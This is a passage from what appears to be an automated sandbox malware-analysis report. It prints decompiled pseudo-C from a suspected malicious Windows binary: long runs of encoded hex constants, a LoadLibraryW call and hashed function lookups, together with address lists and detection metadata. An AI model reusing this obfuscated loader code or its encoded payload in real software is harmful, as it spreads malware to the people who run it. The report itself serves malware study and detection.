				_v212 = 0x9606240;
				_v208 = 0xeece9328;
				_v204 = 0x98343d05;
				_v200 = 0x46089577;
				_v196 = 0x8ca5a500;
				_v192 = 0x5fa8daa2;
				_v188 = 0xfebc41a3;
				_v184 = 0x4f16be69;
				_v180 = 0x5fcd3ff2;
				_v176 = 0x290cab8a;
				_v172 = 0x9084f10f;
				_v168 = 0x21f4372d;
				_v164 = 0xf77c0e4f;
				_v160 = 0xee8b3883;
				_v156 = 0x9d87c954;
				_v152 = 0xb5dc9ad1;
				_v148 = 0x31d7efed;
				_v144 = 0x23271e7d;
				_v140 = 0x2030c0b1;
				_v136 = 0x89cc42fd;
				_v132 = 0x855c1fdb;
				_v128 = 0x4586f4e2;
				_v124 = 0x6c1867c5;
				_v120 = 0x2b50d8a6;
				_v116 = 0xd392eb31;
				_v112 = 0x5adcea22;
				_v108 = 0xb0c01b07;
				_v104 = 0xfc9581f8;
				_v100 = 0x8a3c0db7;
				_v96 = 0xf184c207;
				_v92 = 0xf7612506;
				_v88 = 0xc77cedd3;
				_v84 = 0x456eed47;
				_v80 = 0x4d7c6473;
				_v76 = 0xf66fe5bc;
				_v72 = 0x3b81c48e;
				_v68 = 0x4ca88e47;
				_v64 = 0xf1f7108e;
				_v60 = 0xb6ad32aa;
				_v56 = 0xa746cf25;
				_v52 = 0x76783488;
				_v48 = 0x8a52240d;
				_v44 = 0xf4ff14a7;
				_v40 = 0xf0d384e;
				_v36 = 0x88b9944;
				_v32 = 0x8289fea5;
				_v28 = 0xf70587d8;
				_v24 = 0xecf5125b;
				_v20 = 0x4b2bcabe;
				_v16 = 0x645459e0;
				_v12 = 0x8f09d154;
				_v8 = 0x7a530fa7;
				_t400 = E00401A52(0x412980, 0x72fc3a35);
				 *0x4164f4 = LoadLibraryW(_t391);
				L00401B09(_t400);
				_push(0x414e70);
				_push(0x4fb37d17);
				return E004012FF( *0x4164f4,  &_v1560, 0x185);
			}








































































































































































































































































































































































































                  0x00408cdf
                  0x00408ce9
                  0x00408cf3
                  0x00408cfd
                  0x00408d07
                  0x00408d11
                  0x00408d1b
                  0x00408d25
                  0x00408d2f
                  0x00408d39
                  0x00408d43
                  0x00408d4d
                  0x00408d57
                  0x00408d61
                  0x00408d6b
                  0x00408d75
                  0x00408d7f
                  0x00408d89
                  0x00408d93
                  0x00408d9d
                  0x00408da7
                  0x00408db1
                  0x00408dbb
                  0x00408dc5
                  0x00408dcf
                  0x00408dd9
                  0x00408de3
                  0x00408ded
                  0x00408df7
                  0x00408e01
                  0x00408e0b
                  0x00408e15
                  0x00408e1f
                  0x00408e29
                  0x00408e33
                  0x00408e3d
                  0x00408e47
                  0x00408e51
                  0x00408e5b
                  0x00408e65
                  0x00408e6f
                  0x00408e79
                  0x00408e83
                  0x00408e8d
                  0x00408e97
                  0x00408ea1
                  0x00408eab
                  0x00408eb5
                  0x00408ebf
                  0x00408ec9
                  0x00408ed3
                  0x00408edd
                  0x00408ee7
                  0x00408ef1
                  0x00408efb
                  0x00408f05
                  0x00408f0f
                  0x00408f19
                  0x00408f23
                  0x00408f2d
                  0x00408f37
                  0x00408f41
                  0x00408f4b
                  0x00408f55
                  0x00408f5f
                  0x00408f69
                  0x00408f73
                  0x00408f7d
                  0x00408f87
                  0x00408f91
                  0x00408f9b
                  0x00408fa5
                  0x00408faf
                  0x00408fb9
                  0x00408fc3
                  0x00408fcd
                  0x00408fd7
                  0x00408fe1
                  0x00408feb
                  0x00408ff5
                  0x00408fff
                  0x00409009
                  0x00409013
                  0x0040901d
                  0x00409027
                  0x00409031
                  0x0040903b
                  0x00409045
                  0x0040904f
                  0x00409059
                  0x00409063
                  0x0040906d
                  0x00409077
                  0x00409081
                  0x0040908b
                  0x00409095
                  0x0040909f
                  0x004090a9
                  0x004090b3
                  0x004090bd
                  0x004090c7
                  0x004090d1
                  0x004090db
                  0x004090e5
                  0x004090ef
                  0x004090f9
                  0x00409103
                  0x0040910d
                  0x00409117
                  0x00409121
                  0x0040912b
                  0x00409135
                  0x0040913f
                  0x00409149
                  0x00409153
                  0x0040915d
                  0x00409167
                  0x00409171
                  0x0040917b
                  0x00409185
                  0x0040918f
                  0x00409199
                  0x004091a3
                  0x004091ad
                  0x004091b7
                  0x004091c1
                  0x004091cb
                  0x004091d5
                  0x004091df
                  0x004091e9
                  0x004091f3
                  0x004091fd
                  0x00409207
                  0x00409211
                  0x0040921b
                  0x00409225
                  0x0040922f
                  0x00409239
                  0x00409243
                  0x0040924d
                  0x00409257
                  0x00409261
                  0x0040926b
                  0x00409275
                  0x0040927f
                  0x00409289
                  0x00409293
                  0x0040929d
                  0x004092a7
                  0x004092b1
                  0x004092bb
                  0x004092c5
                  0x004092cf
                  0x004092d9
                  0x004092e3
                  0x004092ed
                  0x004092f7
                  0x00409301
                  0x0040930b
                  0x00409315
                  0x0040931f
                  0x00409329
                  0x00409333
                  0x0040933d
                  0x00409347
                  0x00409351
                  0x0040935b
                  0x00409365
                  0x0040936f
                  0x00409379
                  0x00409383
                  0x0040938d
                  0x00409397
                  0x004093a1
                  0x004093ab
                  0x004093b5
                  0x004093bf
                  0x004093c9
                  0x004093d3
                  0x004093dd
                  0x004093e7
                  0x004093f1
                  0x004093fb
                  0x00409405
                  0x0040940f
                  0x00409419
                  0x00409423
                  0x0040942d
                  0x00409437
                  0x00409441
                  0x0040944b
                  0x00409455
                  0x0040945f
                  0x00409469
                  0x00409473
                  0x0040947d
                  0x00409487
                  0x00409491
                  0x0040949b
                  0x004094a5
                  0x004094af
                  0x004094b9
                  0x004094c3
                  0x004094cd
                  0x004094d7
                  0x004094e1
                  0x004094eb
                  0x004094f5
                  0x004094ff
                  0x00409509
                  0x00409513
                  0x0040951d
                  0x00409527
                  0x00409531
                  0x0040953b
                  0x00409545
                  0x0040954f
                  0x00409559
                  0x00409563
                  0x0040956d
                  0x00409577
                  0x00409581
                  0x0040958b
                  0x00409595
                  0x0040959f
                  0x004095a9
                  0x004095b3
                  0x004095bd
                  0x004095c7
                  0x004095d1
                  0x004095db
                  0x004095e5
                  0x004095ef
                  0x004095f9
                  0x00409603
                  0x0040960d
                  0x00409617
                  0x00409621
                  0x0040962b
                  0x00409635
                  0x0040963f
                  0x00409649
                  0x00409653
                  0x0040965d
                  0x00409667
                  0x00409671
                  0x0040967b
                  0x00409685
                  0x0040968f
                  0x00409699
                  0x004096a3
                  0x004096ad
                  0x004096b7
                  0x004096c1
                  0x004096cb
                  0x004096d5
                  0x004096df
                  0x004096e9
                  0x004096f3
                  0x004096fd
                  0x00409707
                  0x00409711
                  0x0040971b
                  0x00409725
                  0x0040972f
                  0x00409739
                  0x00409743
                  0x0040974d
                  0x00409757
                  0x00409761
                  0x0040976b
                  0x00409775
                  0x0040977f
                  0x00409789
                  0x00409793
                  0x0040979d
                  0x004097a7
                  0x004097b1
                  0x004097bb
                  0x004097c5
                  0x004097cf
                  0x004097d9
                  0x004097e3
                  0x004097ed
                  0x004097f7
                  0x00409801
                  0x0040980b
                  0x00409815
                  0x0040981f
                  0x00409829
                  0x00409833
                  0x0040983d
                  0x00409847
                  0x00409851
                  0x0040985b
                  0x00409865
                  0x0040986f
                  0x00409879
                  0x00409883
                  0x0040988d
                  0x00409897
                  0x004098a1
                  0x004098ab
                  0x004098b5
                  0x004098bf
                  0x004098c9
                  0x004098d3
                  0x004098dd
                  0x004098e7
                  0x004098f1
                  0x004098fb
                  0x00409905
                  0x0040990f
                  0x00409919
                  0x00409923
                  0x0040992d
                  0x00409937
                  0x00409941
                  0x0040994b
                  0x00409955
                  0x0040995f
                  0x00409969
                  0x00409973
                  0x00409982
                  0x00409991
                  0x0040999b
                  0x004099a5
                  0x004099af
                  0x004099b9
                  0x004099c3
                  0x004099cd
                  0x004099d7
                  0x004099e1
                  0x004099eb
                  0x004099f5
                  0x004099ff
                  0x00409a09
                  0x00409a13
                  0x00409a1d
                  0x00409a27
                  0x00409a31
                  0x00409a3b
                  0x00409a45
                  0x00409a4f
                  0x00409a59
                  0x00409a63
                  0x00409a6d
                  0x00409a77
                  0x00409a81
                  0x00409a8b
                  0x00409a95
                  0x00409a9f
                  0x00409aa9
                  0x00409ab3
                  0x00409abd
                  0x00409ac7
                  0x00409ad1
                  0x00409adb
                  0x00409ae2
                  0x00409ae9
                  0x00409af0
                  0x00409af7
                  0x00409afe
                  0x00409b05
                  0x00409b0c
                  0x00409b13
                  0x00409b1a
                  0x00409b21
                  0x00409b28
                  0x00409b2f
                  0x00409b36
                  0x00409b3d
                  0x00409b44
                  0x00409b4b
                  0x00409b52
                  0x00409b59
                  0x00409b60
                  0x00409b67
                  0x00409b6e
                  0x00409b75
                  0x00409b7c
                  0x00409b83
                  0x00409b8a
                  0x00409b91
                  0x00409b98
                  0x00409b9f
                  0x00409ba6
                  0x00409bad
                  0x00409bb4
                  0x00409bc0
                  0x00409bcb
                  0x00409bd0
                  0x00409be1
                  0x00409be6
                  0x00409bfc

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00409BC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: /$/JV$@b`$E~j$FLW'$GnE$MOT~$NTAe$RYp/$SR_a$UE4$[1X$mid $q>c$sd|M$tzYV$ym$YTd
                  • API String ID: 1029625771-3197268478
                  • Opcode ID: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction ID: a2473892be70d7853f5d3ab73c35abe6bfda1bb905b43dc05c267480b0676288
                  • Opcode Fuzzy Hash: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction Fuzzy Hash: 176295F48467698BDB61DF429E847CEBA75BB51345F6096C8C29C3B214CB710B82CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040B6B5, Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 380libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0040B6B5(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				char _v1428;

				_v1428 = 0x35afd9ed;
				_v1424 = 0xb2bb3fd1;
				_v1420 = 0xc54e001f;
				_v1416 = 0x464bd289;
				_v1412 = 0xa62e3cd5;
				_v1408 = 0x10828f30;
				_v1404 = 0xd759c3e6;
				_v1400 = 0x3226a1eb;
				_v1396 = 0x93d3719f;
				_v1392 = 0xff1d7368;
				_v1388 = 0x4cf80263;
				_v1384 = 0x1220b21a;
				_v1380 = 0x9e299973;
				_v1376 = 0x8c93726d;
				_v1372 = 0x388d0cca;
				_v1368 = 0x63dd4a40;
				_v1364 = 0x63312a98;
				_v1360 = 0xc54ade8b;
				_v1356 = 0x57b31f78;
				_v1352 = 0xbaef0446;
				_v1348 = 0xa5fb8b92;
				_v1344 = 0x7ac55a38;
				_v1340 = 0xa13c21f;
				_v1336 = 0x77bc5b0d;
				_v1332 = 0x6b48a641;
				_v1328 = 0xc939f5fe;
				_v1324 = 0xf80f5b16;
				_v1320 = 0xc75ec705;
				_v1316 = 0xdba5663;
				_v1312 = 0x4213a67f;
				_v1308 = 0x3de4493c;
				_v1304 = 0xd6231f80;
				_v1300 = 0x68067b7;
				_v1296 = 0xc082ec40;
				_v1292 = 0xa5d2a512;
				_v1288 = 0x5f226fcb;
				_v1284 = 0x9a62d466;
				_v1280 = 0x2dcc9250;
				_v1276 = 0x68432153;
				_v1272 = 0xe57fc7e;
				_v1268 = 0xf9c65141;
				_v1264 = 0x74e9465;
				_v1260 = 0xa6dac4aa;
				_v1256 = 0x35a3c1f;
				_v1252 = 0xa3662753;
				_v1248 = 0xf78554cb;
				_v1244 = 0xa9ba3f97;
				_v1240 = 0xa7034e35;
				_v1236 = 0xfefc68e9;
				_v1232 = 0xf512b31a;
				_v1228 = 0x7483c20;
				_v1224 = 0x36b5f632;
				_v1220 = 0x38c31e64;
				_v1216 = 0x4c62f726;
				_v1212 = 0x99ba6132;
				_v1208 = 0x323bd5bb;
				_v1204 = 0xd06b8129;
				_v1200 = 0x58ac925d;
				_v1196 = 0x14258239;
				_v1192 = 0x74c7fcd7;
				_v1188 = 0x5b658ef1;
				_v1184 = 0xfef3ed92;
				_v1180 = 0xd6897bdd;
				_v1176 = 0xe3ae805d;
				_v1172 = 0xd7dd3c6a;
				_v1168 = 0xcf62f53e;
				_v1164 = 0x10086fbc;
				_v1160 = 0xb950e66;
				_v1156 = 0x1f978099;
				_v1152 = 0xa5187c45;
				_v1148 = 0xe4f386b;
				_v1144 = 0xa997fe6d;
				_v1140 = 0x39d08a92;
				_v1136 = 0xfb10c42f;
				_v1132 = 0x58d93c66;
				_v1128 = 0x4cf30038;
				_v1124 = 0xa31aa9f3;
				_v1120 = 0xa932cf52;
				_v1116 = 0x2451a583;
				_v1112 = 0xeb831842;
				_v1108 = 0x59b79230;
				_v1104 = 0x47744230;
				_v1100 = 0xd450fcea;
				_v1096 = 0x1959a718;
				_v1092 = 0x6585da84;
				_v1088 = 0xf7b8a766;
				_v1084 = 0xa8e739d6;
				_v1080 = 0x25491a58;
				_v1076 = 0x41855178;
				_v1072 = 0xae9aad57;
				_v1068 = 0x913a6b1b;
				_v1064 = 0xf5bfdaf1;
				_v1060 = 0xe0413efd;
				_v1056 = 0x2a6692be;
				_v1052 = 0xae364f54;
				_v1048 = 0xa4910d06;
				_v1044 = 0xac37d2e2;
				_v1040 = 0x1f0ed562;
				_v1036 = 0xf8313c8;
				_v1032 = 0x1696917a;
				_v1028 = 0x4ba4c9c6;
				_v1024 = 0xca70992d;
				_v1020 = 0x88f129d4;
				_v1016 = 0x8986dfc9;
				_v1012 = 0x8077495d;
				_v1008 = 0x7f188a07;
				_v1004 = 0x7068997b;
				_v1000 = 0x5f73f18e;
				_v996 = 0x7079116d;
				_v992 = 0xf12893f0;
				_v988 = 0x2e1e137f;
				_v984 = 0x9c8a1308;
				_v980 = 0x63f7f786;
				_v976 = 0x82df7bd;
				_v972 = 0xb3225a87;
				_v968 = 0xd1bde73d;
				_v964 = 0x59885592;
				_v960 = 0xc427fd32;
				_v956 = 0x9d169c5c;
				_v952 = 0x6e01ebf2;
				_v948 = 0x9c5f68a9;
				_v944 = 0x559de137;
				_v940 = 0x45953cbd;
				_v936 = 0xd84853c;
				_v932 = 0x65edd287;
				_v928 = 0xef673b85;
				_v924 = 0x7fa3edf8;
				_v920 = 0x83ba664c;
				_v916 = 0xac287487;
				_v912 = 0x4d8c6e16;
				_v908 = 0xd6774e7a;
				_v904 = 0x6a742a14;
				_v900 = 0x7b41d554;
				_v896 = 0x3583a68f;
				_v892 = 0xb64620eb;
				_v888 = 0x968e295c;
				_v884 = 0x1f2a9f33;
				_v880 = 0x20c95888;
				_v876 = 0x3ad04588;
				_v872 = 0x1f3f3349;
				_v868 = 0x8bc63238;
				_v864 = 0x72dfdb8b;
				_v860 = 0x3c084d40;
				_v856 = 0xa03b21f2;
				_v852 = 0x975b711;
				_v848 = 0x66143377;
				_v844 = 0xb0ef4486;
				_v840 = 0x9536b870;
				_v836 = 0xad0c8488;
				_v832 = 0xfa93b301;
				_v828 = 0x625273d4;
				_v824 = 0x2130da0b;
				_v820 = 0x21682fc7;
				_v816 = 0x125bacd0;
				_v812 = 0x8d655941;
				_v808 = 0x7ea7e90a;
				_v804 = 0x998bb919;
				_v800 = 0x4a680a7;
				_v796 = 0x4dc5c9aa;
				_v792 = 0x6f4d8b33;
				_v788 = 0xfff2694d;
				_v784 = 0x7ad03f4c;
				_v780 = 0xec728f7e;
				_v776 = 0xbd5f0efc;
				_v772 = 0x39972492;
				_v768 = 0x8a22d400;
				_v764 = 0xc9e812c9;
				_v760 = 0xd9c8e7;
				_v756 = 0x783a029e;
				_v752 = 0xf55a1b2b;
				_v748 = 0x39a441d8;
				_v744 = 0xfddcd3b7;
				_v740 = 0xa8d3ee78;
				_v736 = 0xb71d00d8;
				_v732 = 0xd8f1a5e0;
				_v728 = 0x171f9db;
				_v724 = 0x608a96cb;
				_v720 = 0x5db98275;
				_v716 = 0x8e64ca5b;
				_v712 = 0x8224c5bb;
				_v708 = 0xf3e18a45;
				_v704 = 0x9fa69ab2;
				_v700 = 0x9858a1cb;
				_v696 = 0x20254080;
				_v692 = 0xc5a28d75;
				_v688 = 0xa7e533b4;
				_v684 = 0xb3f2eb4f;
				_v680 = 0xf3eab420;
				_v676 = 0xe26b573a;
				_v672 = 0x36939b06;
				_v668 = 0xce10ed67;
				_v664 = 0xaa9683c0;
				_v660 = 0x62293a60;
				_v656 = 0x1d84933a;
				_v652 = 0xad1d5e99;
				_v648 = 0x85c61e4e;
				_v644 = 0x5b995538;
				_v640 = 0x8d8b2cb;
				_v636 = 0xa9e61fda;
				_v632 = 0x9cd95a2d;
				_v628 = 0x8a651418;
				_v624 = 0x98b050c0;
				_v620 = 0x40e286e5;
				_v616 = 0x1619f260;
				_v612 = 0xb4bdd31f;
				_v608 = 0xb99d071c;
				_v604 = 0x125c63d2;
				_v600 = 0x2b37c664;
				_v596 = 0x82586a06;
				_v592 = 0x68bb79f8;
				_v588 = 0xde917f5e;
				_v584 = 0x13cb2094;
				_v580 = 0x4e37c720;
				_v576 = 0x6a7f746d;
				_v572 = 0xd082913f;
				_v568 = 0xbf74de13;
				_v564 = 0xa80f39b0;
				_v560 = 0xd992575e;
				_v556 = 0x68739177;
				_v552 = 0x3f37384b;
				_v548 = 0x18bc988d;
				_v544 = 0x46cd9d63;
				_v540 = 0xf4719ae3;
				_v536 = 0xf64f55e0;
				_v532 = 0x87d9f1a7;
				_v528 = 0x8f398c60;
				_v524 = 0x8cb94234;
				_v520 = 0xbbea7dd7;
				_v516 = 0xb9b8b1df;
				_v512 = 0xaa28a9fc;
				_v508 = 0xf0af87ff;
				_v504 = 0x8dd7ca67;
				_v500 = 0xe2b550c4;
				_v496 = 0xd32bc033;
				_v492 = 0x948a965f;
				_v488 = 0x8851f930;
				_v484 = 0x8f5ccc1;
				_v480 = 0x6164f669;
				_v476 = 0x33510924;
				_v472 = 0xcb43e698;
				_v468 = 0x6ce52a33;
				_v464 = 0xa66f015c;
				_v460 = 0x7718680d;
				_v456 = 0x9d1df3bc;
				_v452 = 0x2a00c920;
				_v448 = 0x91fb3000;
				_v444 = 0x10c81bc3;
				_v440 = 0xf8a75bf2;
				_v436 = 0x5ae0234a;
				_v432 = 0xf98cf7ec;
				_v428 = 0x5fc46df;
				_v424 = 0xca1b041b;
				_v420 = 0x2790b2c6;
				_v416 = 0x54daa301;
				_v412 = 0x138923a3;
				_v408 = 0x301c0cdf;
				_v404 = 0x38e0a856;
				_v400 = 0xf03451b0;
				_v396 = 0x99e431f5;
				_v392 = 0x11281ac6;
				_v388 = 0xcf2342ab;
				_v384 = 0x9eab3b39;
				_v380 = 0x9ae3e3f1;
				_v376 = 0x1a6c98f3;
				_v372 = 0x68813b1b;
				_v368 = 0x192d795a;
				_v364 = 0x40d247a5;
				_v360 = 0x72cd97b3;
				_v356 = 0x67b5cebb;
				_v352 = 0x72e3ccbf;
				_v348 = 0x6f4c2d5b;
				_v344 = 0x9e6a8356;
				_v340 = 0x49e92bba;
				_v336 = 0x4f743d77;
				_v332 = 0x153393e1;
				_v328 = 0x13614add;
				_v324 = 0x69ce03ee;
				_v320 = 0x854a7485;
				_v316 = 0x3d8d4e01;
				_v312 = 0x326ab68;
				_v308 = 0x1099a027;
				_v304 = 0xf0ad3f63;
				_v300 = 0xef67c339;
				_v296 = 0x48f2e773;
				_v292 = 0x20c73ca2;
				_v288 = 0x3ce286cb;
				_v284 = 0xc256b288;
				_v280 = 0x5313123f;
				_v276 = 0x298713bc;
				_v272 = 0xa00fff1e;
				_v268 = 0x712c154;
				_v264 = 0x8dfdabca;
				_v260 = 0x1b118de3;
				_v256 = 0x41128fd1;
				_v252 = 0x6de2b7e3;
				_v248 = 0x5024cd33;
				_v244 = 0x6abdc573;
				_v240 = 0x1c49177e;
				_v236 = 0x21386a4d;
				_v232 = 0x93f5651f;
				_v228 = 0xc73e8d48;
				_v224 = 0x3cac36f9;
				_v220 = 0x2d121512;
				_v216 = 0xa1b212f1;
				_v212 = 0x9129c71a;
				_v208 = 0x4db0cfdf;
				_v204 = 0xd654f2c6;
				_v200 = 0x16901ffd;
				_v196 = 0x81f89533;
				_v192 = 0x1b05c4c7;
				_v188 = 0x5eca920e;
				_v184 = 0x7724293;
				_v180 = 0x500c8610;
				_v176 = 0x55e5490d;
				_v172 = 0x62084e15;
				_v168 = 0xcf1eef0a;
				_v164 = 0xc774a676;
				_v160 = 0xae26a56e;
				_v156 = 0xcd297ae8;
				_v152 = 0x4142669a;
				_v148 = 0x7a1cc234;
				_v144 = 0x9b8e60b1;
				_v140 = 0xb4c16bb9;
				_v136 = 0x346d9962;
				_v132 = 0x84307aeb;
				_v128 = 0x7110f065;
